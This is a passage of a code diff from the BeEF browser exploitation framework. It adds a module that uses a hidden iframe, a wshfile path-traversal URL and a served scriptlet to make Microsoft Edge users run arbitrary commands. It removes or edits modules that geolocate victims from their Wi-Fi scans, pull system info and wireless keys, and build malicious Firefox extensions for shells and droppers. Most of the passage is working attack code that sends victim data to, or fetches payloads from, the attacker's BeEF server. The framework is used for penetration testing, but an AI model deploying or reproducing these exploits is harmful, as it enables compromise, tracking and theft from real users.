-				queryString+=ssidList.get(j);
-			
-				queryString+="%7C";
-				queryString+="ss:";
-				queryString+=rssiList.get(j);
-				j++;
-			}		
-		} catch (Exception e) { 
-			System.out.println(e.getMessage());
-		}
-		return queryString;		
-	}
-	
-	public static String getMac(){
-        try {  
-                Process p = Runtime.getRuntime().exec("/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport scan");  
-                BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));  
-                String line = null;  
-				String ssidStr = null;
-				String signal = null;
-				
-				String queryString = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true";
-		
-				ArrayList ssidList = new ArrayList();
-				ArrayList bssidList = new ArrayList();
-				ArrayList rssiList = new ArrayList();
-
-				line = in.readLine();	
-				while ((line = in.readLine()) != null) {  
-					line = line.replaceAll("^\\s+", "");
-					
-					Pattern p1 = Pattern.compile("((.?)*\\s\\w*):(\\w*:\\w*:\\w*:\\w*:\\w*)\\s((.?)*)\\s(\\d+)");
-					Matcher m1 = p1.matcher(line);
-					if(m1.find()){
-						ssidStr = m1.group(1);
-						ssidStr = ssidStr.replaceAll(" ","%20");
-						ssidList.add(ssidStr);
-						bssidList.add(m1.group(2));
-						signal = m1.group(3);
-						signal = signal.replaceAll(" ","");
-						rssiList.add(signal);
-					}
-					
-				}
-			int arraySize=ssidList.size();
-			if(arraySize==0){
-				result="\nI don't know where the target is";
-			}
-			else{
-				result=googleLookup(bssidList,ssidList,rssiList);
-			}
-		} catch (Exception e) { 
-			System.out.println(e.getMessage());
-		}  
-		return result;		
-	}  
-
-	public static boolean isWindows() {
- 
-		String os = System.getProperty("os.name").toLowerCase();
-		// windows
-		return (os.indexOf("win") >= 0);
- 
-	}
- 
-	public static boolean isMac() {
- 
-		String os = System.getProperty("os.name").toLowerCase();
-		// Mac
-		return (os.indexOf("mac") >= 0);
- 
-	}
- 
-	public static boolean isLinux() {
- 
-		String os = System.getProperty("os.name").toLowerCase();
-		// linux or unix
-		return (os.indexOf("nix") >= 0 || os.indexOf("nux") >= 0);
- 
-	}
-
-    }  

modules/host/get_physical_location/module.rb

@@ -1,40 +0,0 @@
-#
-# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-
-require 'rubygems'
-require 'json'
-require 'open-uri'
-
-class Get_physical_location < BeEF::Core::Command
-
-  def pre_send
-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_physical_location/getGPSLocation.jar', '/getGPSLocation', 'jar')
-  end
-
-  def post_execute        
-    results = @datastore['results'].to_s
-    results = results.gsub("location_info=","")
-
-    response = open(results).read
-    result = JSON.parse(response)
-    reverseGoogleUrl = "https://maps.googleapis.com/maps/geo?q="+result['location']['lat'].to_s+','+result['location']['lng'].to_s+"&output=json&sensor=true_or_false"
-    googleResults = open(reverseGoogleUrl).read
-    jsonGoogleResults = JSON.parse(googleResults)
-
-    addressFound = jsonGoogleResults['Placemark'][0]['address']
-
-    writeToResults = Hash.new
-    writeToResults['data'] = addressFound
-    BeEF::Core::Models::Command.save_result(@datastore['beefhook'], @datastore['cid'] , @friendlyname, writeToResults, 0)
-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/getGPSLocation.jar')
-
-    content = {}
-    content['Result'] = addressFound
-    save content
-  end
-
-end
-

modules/host/get_system_info_java/command.js

@@ -6,39 +6,36 @@
 
 beef.execute(function() {
 
-	var internal_counter = 0;
-	var timeout = 30;
-	var output;
+  var internal_counter = 0;
+  var timeout = 30;
+  var output;
 
-	beef.dom.attachApplet('getSystemInfo', 'getSystemInfo', 'getSystemInfo', beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/", null, null);
+  beef.debug('[Get System Info (Java)] Loading getSystemInfo applet...');
+  beef.dom.attachApplet('getSystemInfo', 'getSystemInfo', 'getSystemInfo', beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/", null, null);
 
-	if (beef.browser.isFF()) {
+  function waituntilok() {
+    beef.debug('[Get System Info (Java)] Executing getSystemInfo applet...');
 
-		output = document.getSystemInfo.getInfo();
-		if (output) beef.net.send('<%= @command_url %>', <%= @command_id %>, 'system_info='+output.replace(/\n/g,"<br>"));
-		beef.dom.detachApplet('getSystemInfo');
+    try {
+      output = document.getSystemInfo.getInfo();
+      if (output) {
+        beef.debug('[Get System Info (Java)] Retrieved system info: ' + output);
+         beef.net.send('<%= @command_url %>', <%= @command_id %>, 'system_info='+output.replace(/\n/g,"<br>"), beef.are.status_success());
+        beef.dom.detachApplet('getSystemInfo');
+        return;
+      }
+    } catch (e) {
+      internal_counter = internal_counter + 5;
+      if (internal_counter > timeout) {
+        beef.debug('[Get System Info (Java)] Timeout after ' + timeout + ' seconds');
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'system_info=Timeout after ' + timeout + ' seconds', beef.are.status_error());
+        beef.dom.detachApplet('getSystemInfo');
+        return;
+      }
+      setTimeout(function() {waituntilok()}, 5000);
+    }
+  }
 
-	} else {
-
-		function waituntilok() {
-			try {
-				output = document.getSystemInfo.getInfo();
-				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'system_info='+output.replace(/\n/g,"<br>"));
-				beef.dom.detachApplet('getSystemInfo');
-				return;
-			} catch (e) {
-				internal_counter++;
-				if (internal_counter > timeout) {
-					beef.net.send('<%= @command_url %>', <%= @command_id %>, 'system_info=Timeout after '+timeout+' seconds');
-					beef.dom.detachApplet('getSystemInfo');
-					return;
-				}
-				setTimeout(function() {waituntilok()},1000);
-			}
-		}
-
-		setTimeout(function() {waituntilok()},5000);
-
-	}
+  setTimeout(function() {waituntilok()}, 5000);
 });
 

modules/host/get_system_info_java/config.yaml

@@ -15,5 +15,4 @@ beef:
                 not_working:
                     ALL:
                         os: ["iOS", "Macintosh"]
-                working: ["O", "FF", "S", "IE"]
-                user_notify: ["C"]
+                user_notify: ["C", "O", "FF", "S", "IE"]

modules/host/get_system_info_java/module.rb

@@ -6,7 +6,7 @@
 class Get_system_info_java < BeEF::Core::Command
   
 	def pre_send
-		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_system_info/getSystemInfo.class','/getSystemInfo','class')
+		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_system_info_java/getSystemInfo.class','/getSystemInfo','class')
 	end
   
 	def post_execute

modules/host/get_wireless_keys/config.yaml

@@ -10,7 +10,7 @@ beef:
             enable: true
             category: "Host"
             name: "Get Wireless Keys"
-            description: "This module will retrieve the wireless profiles from the target computer.<br/><br/>You will need to copy the results to 'exported_wlan_profiles.xml' and then reimport back into your Windows Vista/7 computers by running the command:<br/>netsh wlan add profile filename=\"exported_wlan_profiles.xml\".<br/><br/>After that, just launch and connect to the wireless network without any password prompt.<br/><br/>For more information, refer to http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html"
+            description: "This module will retrieve the wireless profiles from the target system (Windows Vista and Windows 7 only).<br/><br/>You will need to copy the results to 'exported_wlan_profiles.xml' and then reimport back into your Windows Vista/7 computers by running the command:<br/>netsh wlan add profile filename=\"exported_wlan_profiles.xml\".<br/><br/>After that, just launch and connect to the wireless network without any password prompt.<br/><br/>For more information, refer to http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html"
             authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
             target:
                 user_notify: ["IE", "C", "S", "O", "FF"]

modules/social_engineering/edge_wscript_wsh_injection/command.js

@@ -0,0 +1,31 @@
+//
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function(){
+  var timeout = 5;
+
+  if (!beef.browser.isEdge()) {
+    beef.debug("[Edge WScript WSH Injection] Browser is not supported.");
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser is not supported', beef.are.status_error());
+    return;
+  }
+
+  try {
+    var wsh_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+    var beef_host = beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port;
+    wsh_iframe_<%= @command_id %>.setAttribute('src', 'wshfile:test/../../../../../../../Windows/System32/Printing_Admin_Scripts/' + navigator.language + '/pubprn.vbs" 127.0.0.1 script:' + beef_host + '/<%= @command_id %>/index.html');
+  } catch (e) {
+    beef.debug("[Edge WScript WSH Injection] Could not create iframe");
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Could not create iframe', beef.are.status_error());
+    return;
+  }
+
+  // clean up
+  cleanup = function() {
+    document.body.removeChild(wsh_iframe_<%= @command_id %>);
+  }
+  setTimeout("cleanup()", timeout*1000);
+});

modules/social_engineering/edge_wscript_wsh_injection/config.yaml

@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+  module:
+    edge_wscript_wsh_injection:
+      enable: true
+      category: ["Social Engineering"]
+      name: "Edge WScript WSH Injection"
+      description: "Prompts the user to run \"Microsoft Windows Based Script Host\" (WScript.exe).<br/><br/>Uses <a href='https://leucosite.com/Microsoft-Edge-RCE/'>wshfile protocol handler</a> technique to load pubprn.vbs and <a href='https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/'>WSH injection in pubprn.vbs</a> to execute arbitrary code.<br/><br/>If the user allows execution, a VBS payload is downloaded from BeEF, and the specified commands are executed."
+      authors: [
+        "@qab",       # wshfile protocol handler + traversal technique, and exploit
+        "@enigma0x3", # pubprn.vbs technique and exploit
+        "bcoles"      # BeEF
+      ]
+      target:
+        user_notify: ["E"]
+        not_working: ["ALL"]

modules/social_engineering/edge_wscript_wsh_injection/module.rb

@@ -0,0 +1,60 @@
+#
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Edge_wscript_wsh_injection < BeEF::Core::Command
+
+  def pre_send
+    payload = ''
+    @datastore.each do |input|
+      if input['name'] == 'payload'
+        payload = input['value']
+      end
+    end
+
+    rand_str = rand(32**10).to_s(32)
+
+    script = <<-EOF
+<?XML version="1.0"?>                                                                                           
+  <scriptlet>
+
+  <registration
+    description="#{rand_str}"
+    progid="#{rand_str}"
+    version="1.00"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+    remotable="true"
+  >
+  </registration>
+
+  <script language="JScript">
+  <![CDATA[
+    var r = new ActiveXObject("WScript.Shell").Run("#{payload.gsub('"', '\\"')}");
+  ]]>
+  </script>
+
+  </scriptlet>
+EOF
+
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200',
+      {
+        'Content-Type' => 'text/html'
+      },
+      script,
+      "/#{@command_id}/index.html",
+      -1
+    )
+  end
+
+  def self.options
+    return [
+      {'name' => 'payload', 'ui_label' => 'Commands', 'value' => "calc.exe"}
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind("/#{@command_id}/index.html")
+  end
+end

modules/social_engineering/firefox_extension_bindshell/config.yaml

@@ -12,5 +12,8 @@ beef:
             description: "Create on the fly a malicious Firefox extension that binds a shell to a specified port.<br/><br/>The extension is based on the original work from Michael Schierl and his Metasploit module, and joev's Firefox payloads for Metasploit."
             authors: ["antisnatchor", "bcoles"]
             target:
-                user_notify: ["FF"]
+                user_notify:
+                    FF:
+                        min_ver: 1
+                        max_ver: 56
                 not_working: ["All"]

modules/social_engineering/firefox_extension_dropper/config.yaml

@@ -12,5 +12,8 @@ beef:
             description: "Create on the fly a malicious Firefox extension that embeds a dropper you can specify (add it to the 'dropper' directory). <br/><br/> The extension is based on the original work from Michael Schierl and his Metasploit module."
             authors: ["antisnatchor"]
             target:
-                user_notify: ["FF"]
+                user_notify:
+                    FF:
+                        min_ver: 1
+                        max_ver: 56
                 not_working: ["All"]

modules/social_engineering/firefox_extension_reverse_shell/config.yaml

@@ -12,5 +12,8 @@ beef:
             description: "Create on the fly a malicious Firefox extension that makes a reverse shell connection to a specified host:port.<br/><br/>The extension is based on the original work from Michael Schierl and his Metasploit module, and joev's Firefox payloads for Metasploit."
             authors: ["antisnatchor", "bcoles"]
             target:
-                user_notify: ["FF"]
+                user_notify:
+                    FF:
+                        min_ver: 1
+                        max_ver: 56
                 not_working: ["All"]